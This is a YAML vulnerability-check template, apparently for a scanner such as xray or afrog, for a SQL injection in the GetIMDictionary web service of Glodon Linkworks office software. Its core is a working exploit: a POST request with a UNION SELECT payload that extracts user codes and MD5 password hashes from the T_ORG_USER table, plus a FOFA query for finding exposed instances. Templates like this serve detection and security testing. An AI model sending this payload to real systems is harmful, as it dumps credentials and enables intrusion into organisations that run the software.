id: glodon-linkworks-getimdirectionary-sqli

info:
  name: 广联达 Linkworks GetIMDictionary SQL 注入
  author: peiqi
  severity: high
  verified: true
  description: |
    广联达 Linkworks办公OA GetIMDictionary接口存在SQL注入漏洞，发送请求包后可以获取数据库中的敏感信息
    FOFA: body="/Services/Identification/"
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/广联达/广联达%20Linkworks%20GetIMDictionary%20SQL注入漏洞.html
  tags: glodon,sqli
  created: 2023/08/13

rules:
  r0:
    request:
      method: POST
      path: /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
      body: key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
    expression: response.status == 200 && response.body.bcontains(b'<?xml version=') && response.body.bcontains(b'value="admin:')
expression: r0()